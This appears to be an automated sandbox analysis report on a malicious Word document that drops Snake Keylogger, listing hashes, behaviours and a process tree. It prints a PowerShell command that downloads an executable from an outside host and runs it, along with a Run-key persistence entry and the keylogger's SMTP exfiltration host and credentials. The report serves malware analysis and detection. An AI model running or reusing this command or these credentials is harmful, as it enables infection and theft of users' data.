Analysis
- max time kernel: 270s
- max time network: 176s
- platform: windows7_x64
- resource: win7v20210408
- submitted: 23-07-2021 14:01
Static task: static1
Behavioral task: behavioral1
- Sample: Specifications_Details_202300_RFQ.doc
- Resource: win7v20210408
Behavioral task: behavioral2
- Sample: Specifications_Details_202300_RFQ.doc
- Resource: win10v20210410
General
- Target: Specifications_Details_202300_RFQ.doc
- Size: 238KB
- MD5: 9efbd937ce6f8fef4ad85ee94d9cfd47
- SHA1: d8eb24e90091238e2f6bd204ea67d54c5c4efdb6
- SHA256: 574ec668750302f0bb7634d757ce2436753a95d6f9610bc227e13abdecbfc6d5
- SHA512: 86e2b112d30a010096fca79fea0bdbd1c927a7548ea172f8e9d763bcca54216b836ae9edd960d9c844ebd862c48360d4c11ef86d6a3822ebd9e469c8ac3d694e
Malware Config
Extracted
http://easyviettravel.vn/vendor/seld/0A3/Specifications_Details_202300_RFQ.exe
Extracted
snakekeylogger
- Protocol: smtp
- Host: netjul.xyz
- Port: 587
- Username: silyatwo@netjul.xyz
- Password: Q;QcczP{&6=~
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description: Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process; pid: 1456; pid_target: 1848; process: cmd.exe; target process: WINWORD.EXE
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
pid: 536; process: twodark.exe
-
Loads dropped DLL 1 IoCs
Processes:
pid: 1932; process: twodark.exe
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
description: Set value (str); ioc: \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\chrom = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\chrom\\chrom.exe\""; process: twodark.exe
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow: 9; ioc: checkip.dyndns.org
flow: 14; ioc: freegeoip.app
flow: 15; ioc: freegeoip.app
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
description: PID 1932 set thread context of 536; pid: 1932; process: twodark.exe; target process: twodark.exe
-
Drops file in Windows directory 1 IoCs
Processes:
description: File opened for modification; ioc: C:\Windows\Debug\WIA\wiatrace.log; process: WINWORD.EXE
-
Office loads VBA resources, possible macro or embedded object present
-
Modifies Internet Explorer settings
Processes:
description: Key created; ioc: \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar; process: WINWORD.EXE
description: Set value (str); ioc: \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"; process: WINWORD.EXE
description: Key created; ioc: \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote; process: WINWORD.EXE
description: Set value (int); ioc: \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"; process: WINWORD.EXE
description: Key created; ioc: \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt; process: WINWORD.EXE
description: Set value (str); ioc: \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"; process: WINWORD.EXE
description: Set value (int); ioc: \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"; process: WINWORD.EXE
description: Key created; ioc: \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel; process: WINWORD.EXE
description: Set value (str); ioc: \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"; process: WINWORD.EXE
-
Runs ping.exe 1 TTPs 4 IoCs
Processes:
pid: 2016; process: PING.EXE
pid: 1632; process: PING.EXE
pid: 1128; process: PING.EXE
pid: 1624; process: PING.EXE
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
pid: 1848; process: WINWORD.EXE
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
pid: 1680; process: powershell.exe
pid: 1680; process: powershell.exe
pid: 752; process: powershell.exe
pid: 752; process: powershell.exe
pid: 1356; process: powershell.exe
pid: 1356; process: powershell.exe
pid: 1372; process: powershell.exe
pid: 1372; process: powershell.exe
pid: 992; process: powershell.exe
pid: 992; process: powershell.exe
pid: 1932; process: twodark.exe
pid: 1932; process: twodark.exe
pid: 536; process: twodark.exe
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
description: Token: SeDebugPrivilege; pid: 1680; process: powershell.exe
description: Token: SeDebugPrivilege; pid: 752; process: powershell.exe
description: Token: SeDebugPrivilege; pid: 1356; process: powershell.exe
description: Token: SeDebugPrivilege; pid: 1372; process: powershell.exe
description: Token: SeDebugPrivilege; pid: 992; process: powershell.exe
description: Token: SeDebugPrivilege; pid: 1932; process: twodark.exe
description: Token: SeDebugPrivilege; pid: 536; process: twodark.exe
-
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
pid: 1848; process: WINWORD.EXE
pid: 1848; process: WINWORD.EXE
-
Suspicious use of WriteProcessMemory 57 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Specifications_Details_202300_RFQ.doc"
Process tree depth: 1
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe
Command line: cmd /c ""C:\Users\Public\Documents\frontcheck.bat" "
Process tree depth: 2
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell -w h Start-BitsTransfer -Source htt`p://easyviettravel.vn/vendor/seld/0A3/Specifications_Details_202300_RFQ.exe -Destination C:\Users\Public\Documents\twodark.exe;C:\Users\Public\Documents\twodark.exe
Process tree depth: 3
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\Documents\twodark.exe
Command line: "C:\Users\Public\Documents\twodark.exe"
Process tree depth: 4
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping gooogle.com
Process tree depth: 5
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXE
Command line: "C:\Windows\system32\PING.EXE" gooogle.com
Process tree depth: 6
- Runs ping.exe
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping gooogle.com
Process tree depth: 5
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXE
Command line: "C:\Windows\system32\PING.EXE" gooogle.com
Process tree depth: 6
- Runs ping.exe
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping gooogle.com
Process tree depth: 5
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXE
Command line: "C:\Windows\system32\PING.EXE" gooogle.com
Process tree depth: 6
- Runs ping.exe
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping gooogle.com
Process tree depth: 5
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXE
Command line: "C:\Windows\system32\PING.EXE" gooogle.com
Process tree depth: 6
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\twodark.exe
Command line: C:\Users\Admin\AppData\Local\Temp\twodark.exe
Process tree depth: 5
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\splwow64.exe
Command line: C:\Windows\splwow64.exe 12288
Process tree depth: 2
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads